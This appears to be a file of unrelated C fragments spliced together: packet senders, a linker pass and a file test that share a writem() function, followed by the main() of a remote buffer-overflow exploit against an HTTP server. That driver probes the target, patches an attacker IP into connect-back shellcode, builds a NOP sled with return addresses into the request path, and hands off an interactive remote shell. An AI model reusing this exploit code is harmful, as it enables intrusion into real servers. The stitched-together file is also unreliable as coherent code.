int send_emwin_packet(int fd, struct emwin_packet_st *ep,
		      int timeout_ms, int retry){
  /*
   * Write ep->packet (ep->packet_size bytes) to the client socket fd
   * with writem(), passing along the caller's write timeout and retry
   * count.
   *
   * Returns:
   *  -1 => writem() reported a write error
   *   0 => every byte of the packet was written
   *   1 => writem() returned without an error but wrote fewer bytes
   *        than ep->packet_size (treated as a timeout)
   */
  ssize_t written = writem(fd, ep->packet, ep->packet_size,
			   (unsigned int)timeout_ms, retry);

  if(written == -1)
    return(-1);

  if(written != ep->packet_size)
    return(1);

  return(0);
}
  void
linkem(void)
{
	/*
	 * Run the link passes in order: read the input, relocate, evaluate
	 * symbol values, patch, and write the result.  Nothing past the
	 * read step runs when readem() returns zero (presumably its failure
	 * indication -- confirm against readem()).
	 */
	if (readem()) {
		relocatem();
		valuem();
		pokem();
		writem();
	}
}
static int send_nbs2_client(struct conn_element_st *ce,
			    void *packet, uint32_t packet_size){
  /*
   * Write one packet to the client behind ce with writem(), using the
   * connection's configured write timeout and retry count.
   *
   * Returns:
   *  -1 => writem() failed (logged via log_err2)
   *   1 => fewer than packet_size bytes were written; treated as a
   *        timeout (a partial write counts as failure)
   *   0 => the whole packet was written
   *
   * On any non-zero result the connection is marked for teardown: its
   * fd is replaced by -1 and connection_status is set to -1 so that the
   * main thread (process_dirty_connections() in serverm.c) closes the
   * connection and lets the client re-establish it -- there is no other
   * way to resynchronize server and client after a short write.  If
   * raising that flag fails (mutex error) the client thread's exit flag
   * is set instead.
   *
   * NOTE(review): the descriptor is overwritten with -1 here without a
   * close(); this relies on process_dirty_connections() still being
   * able to reach the real socket -- confirm against serverm.c.
   */
  int fd = conn_element_get_fd(ce);
  char *nameorip = conn_element_get_nameorip(ce);
  int timeout_ms = conn_element_get_write_timeout_ms(ce);
  int retry = conn_element_get_write_timeout_retry(ce);
  int rc;

  ssize_t nwritten = writem(fd, packet, (size_t)packet_size,
			    (unsigned int)timeout_ms, retry);

  if(nwritten == -1){
    log_err2("Cannot transmit to client", nameorip);
    rc = -1;
  } else if((size_t)nwritten == packet_size) {
    rc = 0;
  } else {
    log_errx("Cannot transmit to client %s. Timed out %d ms.",
	     nameorip, timeout_ms);
    rc = 1;
  }

  if(rc == 0){
    conn_stats_update_packets(&ce->cs, (size_t)packet_size);
    if(g.f_debug != 0)
      log_msg(LOG_DEBUG, "Transmit OK to client %s", nameorip);
  } else {
    conn_element_set_fd(ce, -1);
    if(conn_element_set_connection_status(ce, -1) != 0)
      conn_element_set_exit_flag(ce);
  }

  return(rc);
}
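/* Simple test of writem()
 *
 * Calls writem(m, n, fname) and then checks that fname can be opened
 * and that n integers can be parsed back out of it.  (Assumes writem()
 * writes one integer per element of m in a form fscanf("%d") can read
 * -- confirm against writem(); the original looped over a fixed 25.)
 *
 * Returns 0 on success, 1 if the file cannot be opened or holds fewer
 * than n parseable integers.  The file is closed on every path.
 */
int testWRITEM(int *m, int n, char *fname) {
  int i, j;
  int rc = 0;

  writem(m, n, fname);

  FILE *dst = fopen(fname, "r");
  if (dst == NULL)
    return 1;

  for (i = 0; i < n; i++) {
    /* fscanf() returns the number of items matched, or EOF (-1) on
     * end-of-file; only an exact match of one integer counts.  The
     * original test used `!read`, which let EOF through as success. */
    if (fscanf(dst, "%d", &j) != 1) {
      rc = 1;
      break;
    }
  }

  fclose(dst);
  return rc;
}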
int main(int argc, char **argv, char **env) {
  /*
   * Exploit driver entry point.  Parses the options, probes the target
   * with one plain GET request, and -- only when -e was given -- sends
   * the crafted request and hands the resulting socket to shell().
   * Nearly everything used here (ch, i, target, addr, bsize, retfill,
   * cmd, path, back, t, sock, s, l, ...) is file-scope state defined
   * outside this function.
   */
  /* usage() presumably exits; the fputc() runs on every invocation. */
  if(argc<=1) usage(argv[0]); fputc('\n', stderr);
  while((ch=getopt(argc,argv,"t:s:p:a:l:i:r:xeb:vh"))!=EOF)
    switch (ch) {
    case 't': {
      /* Target selection: 0 lists the table and exits, otherwise the
       * value is a 1-based index into tlist[]. */
      i = atoi(optarg);
      if(!i)
	list_targets(),
          exit(0);
        else
          i--;
      /* NOTE(review): i indexes tlist[] with no upper-bound check; a
       * too-large -t value reads past the table. */
      target = tlist[i].type;
      addr = tlist[i].ret_addr;
      bsize = tlist[i].bsize;
      retfill = tlist[i].retfill;
      /* Server minor version is inferred from the target's name. */
      if(strstr(tlist[i].type, "1.3")) ver=3;
      if(strstr(tlist[i].type, "1.4")) ver=4;
    } break;
    case 's': {
      /* Shellcode selection.  NOTE(review): slist[i] is indexed with an
       * unchecked atoi() result, same concern as tlist[] above. */
      i = atoi(optarg);
      shelltype = slist[i].shelltype;
      shellcode = slist[i].shellcode;
      shellport = slist[i].shellport;
      backport = slist[i].backport;
    } break;
    /* strncpy() does not NUL-terminate when optarg fills the whole
     * buffer; path (and cmd in -b below) may be left unterminated. */
    case 'p': strncpy(path, optarg, sizeof(path)); break;
    case 'a': addr = strtoul(optarg, NULL, 0); break;
    case 'l': rlen = atoi(optarg); break;
    case 'i': bsize = atoi(optarg); break;
    case 'r': retfill = atoi(optarg); break;
    case 'v': verbose++; break;
    case 'x': test_shellcode(); break;
    case 'e': exploit++; break;
    case 'b': {
      /* Connect-back address given as a.b.c.d: dots become spaces so
       * the four octets can be pulled out with sscanf().  Its return
       * value is not checked, so a malformed string leaves some of
       * a..d at whatever they held before. */
      strncpy(cmd, optarg, sizeof(cmd));
      for(i = 0; i < strlen(cmd); i++)
	if(cmd[i] == '.') cmd[i] = ' ';
      sscanf(cmd, "%d %d %d %d", &a, &b, &c, &d);
      /* A zero octet is refused (presumably because it would put a NUL
       * byte inside the string-based payload). */
      if(!a||!b||!c||!d)
	log("0 in the ip. pls use another\n"),
          exit(0);
      if(!shellcode)
	log("use -s option before -b\n"),
          exit(0);
      /* Patch the four octets into the selected shellcode at its fixed
       * address offset and keep the same 4 bytes in `back`. */
      if(shellcode==x86_bsd_connback)
	shellcode[24] = (char ) a,
	  shellcode[25] = (char ) b,
	  shellcode[26] = (char ) c,
	  shellcode[27] = (char ) d,
	  memcpy(&back, shellcode+24, 4);
      if(shellcode==x86_linux_connback)
	shellcode[12+33] = (char ) a,
	  shellcode[12+34] = (char ) b,
	  shellcode[12+35] = (char ) c,
	  shellcode[12+36] = (char ) d,
	  memcpy(&back, shellcode+12+33, 4);
    } break;
    case 'h': default: usage(argv[0]); break;
    }
  /* The last argument is host[:port]; a ':' splits it in place. */
  dest=argv[argc - 1];
  ptr=strchr(dest,':'); if(ptr!=NULL) { ptr[0]='\0'; ptr++; port=atoi(ptr);}

  /*
   * Probe phase: one plain GET for `path`.  recvall() presumably sets
   * srvok / m302ok and may fill in rlen; those drive the checks below.
   */
  log("start attack: (1.%d) %s\n\n", ver, target);
  log("connecting to %s %d ... ", dest, port);
  if(connectm(dest, port, &t)) exit(0);
  log("building query ...\n");
  /* ver > 3 targets get a Host: header.  From here on `target` holds
   * that strdup()'d header (or ""), not the tlist type string, and is
   * what FREE(target) releases at the end. */
  if(ver>3) {
    sprintf(cmd, "Host: %s\n", dest);
    target=strdup(cmd);
  } else
    target=strdup("");
  /* NOTE(review): unbounded sprintf() into cmd with user-supplied path
   * and dest; cmd's size is not visible here.  snprintf(cmd,
   * sizeof(cmd), ...) with a truncation check would be the safe form. */
  sprintf(cmd,
    "GET %s HTTP/1.0\n"
    "%s"
    "Accept: text/html, text/plain\n"
	  "Accept: application/postscript, text/sgml, */*;q=0.01\n"
    "Accept-Encoding: gzip, compress\n"
    "Accept-Language: en\n"
    "Negotiate: trans\n"
    "User-Agent: Lynx/6.6.6\n"
	  "\n", path, target);
  log("sending query (%d) ... ", strlen(cmd));
  if(verbose) log("send>\n%s\n<send\n", cmd);
  /* perror() runs unconditionally, so it prints a (possibly stale)
   * errno message even when writem() succeeded. */
  writem(); perror(NULL);
  log("receiving data ...\n");
  recvall(rlen);
  close(t);
  /* Nothing to do if the server answered normally, if the path was not
   * redirected, or if rlen could not be detected / is odd. */
  if(srvok)
    exit(0);
  if(!m302ok)
    log("url path not redirected. use -p to override\n"),
      exit(0);
  if(!rlen)
    log("rlen auto detection fail. use -l to override\n"),
      exit(0);
  if(rlen % 2)
    log("alignment error (rlen: %d). not exploitable.\n", rlen),
      exit(0);

  log("addr: 0x%x\n", (unsigned int) addr);
  log("rlen: %d\n", rlen);
  log("offset: %d\n", offset);
  /* The table/-a address is adjusted by the detected response length
   * and the global `offset`. */
  addr += rlen + offset;
  log("use addr: 0x%x (addr + rlen + offset)\n", (unsigned int) addr);

  /* Payload size: what is left of the target's buffer after rlen and
   * the return-address fill, halved (the log line spells this out). */
  bsize-=rlen;
  bsize-=retfill;
  bsize/=2;
  log("buffer size: %d ((bsize-rlen-retfill)/2)\n", bsize);
  log("retfill: %d\n", retfill);
  log("shellcode len: %d\n\n", strlen(shellcode));

  /* Dry run ends here unless -e was given. */
  if(!exploit)
    log("all seems ok. run again with -e option\n"),
      exit(0);
  if(backport) {
    /* Connect-back shellcode: open a listener on backport for the target
     * to call in.  debug() presumably logs the wrapped call's result;
     * bind()/listen() failures are not otherwise acted on. */
    if(!back)
      log("no connect back ip. use -b option\n"),
	exit(0);
    log("connect back to: 0x%08x %d\n", (unsigned long) back, backport);
    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    s.sin_family = AF_INET;
    s.sin_port = htons(backport);
    s.sin_addr.s_addr = htonl(INADDR_ANY);
    debug("... bind", bind(sock, (struct sockaddr *)&s, sizeof(s)));
    debug("... listen", listen(sock, 5));
  }
  /* Busy-waits TIMEOUT seconds through a setjmp()/longjmp() loop; this
   * spins the CPU rather than sleeping. */
  starttime = time(NULL); setjmp(w);
  log("ready in %d sec...\r", starttime + TIMEOUT - time(NULL));
  if(starttime + TIMEOUT >= time(NULL)) longjmp(w, 1);

  log("connecting to %s %d ... ", dest, port);
  if(connectm(dest, port, &t)) exit(0);
  log("building data ...\n");
  /* Payload layout: bsize bytes of 0x90 (x86 NOP) with the shellcode
   * overwriting the tail of that region, followed by addr repeated for
   * retfill bytes.  malloc() is unchecked.
   * NOTE(review): addr is stored through a long*, so on platforms where
   * long is 8 bytes each 4-byte step writes 8 bytes; the layout
   * presumably assumes a 32-bit long.  Because buff is later passed
   * through sprintf("%s"), it ends at the first zero byte -- a NUL in
   * the shellcode or in addr truncates the payload. */
  buff = (char *)malloc(bsize+retfill*4+100);
  memset(buff, 0x00, bsize+retfill*4+100);
  for(i=0; i<bsize; i++) buff[i] = 0x90;
  ptr=buff+((bsize)-(strlen(shellcode)));
  for(i=0; i<strlen(shellcode); i++) *(ptr++) = shellcode[i];
  addr_ptr = (long *)ptr;
  for(i=0; i<retfill; i+=4) *(addr_ptr++)=addr;

  log("building query + data ...\n");
  /* The real request: the payload is appended to the URL path.  Same
   * unbounded sprintf() concern as above, now with buff included. */
  sprintf(cmd,
    "GET %s%s HTTP/1.0\n"
    "%s"
    "Accept: text/html, text/plain\n"
	  "Accept: application/postscript, text/sgml, */*;q=0.01\n"
    "Accept-Encoding: gzip, compress\n"
    "Accept-Language: en\n"
    "Negotiate: trans\n"
    "User-Agent: Lynx/6.6.6\n"
	  "\n", path, buff, target);
  log("sending query + data (all: %d) (buff: %d) ... ",
      strlen(cmd), strlen(buff));
  if(verbose) log("send>\n%s\n<send\n", cmd);
  writem(); perror(NULL);

  /* Obtain the shell: connect to shellport after a short pause (bind
   * shell), or accept() the incoming connection on the listener
   * (connect-back).  `l` is not set in this function; it presumably
   * already holds sizeof(s) -- confirm where it is defined. */
  log("shell ...\n");
  if(shellport) {
    log("connecting to %s %d ... ", dest, shellport);
    sleep(1); if(connectm(dest, shellport, &sock)) exit(0);
  }
  if(backport) {
    debug("... accept", sock = accept(sock, (struct sockaddr *)&s, &l));
  }
  /* SIGINT (2) goes to sigh() while the interactive shell() runs. */
  signal(2, sigh);
  shell();
  CLOSE(t);
  CLOSE(sock);
  FREE(target);
  log("done.\n");
  return 0;
}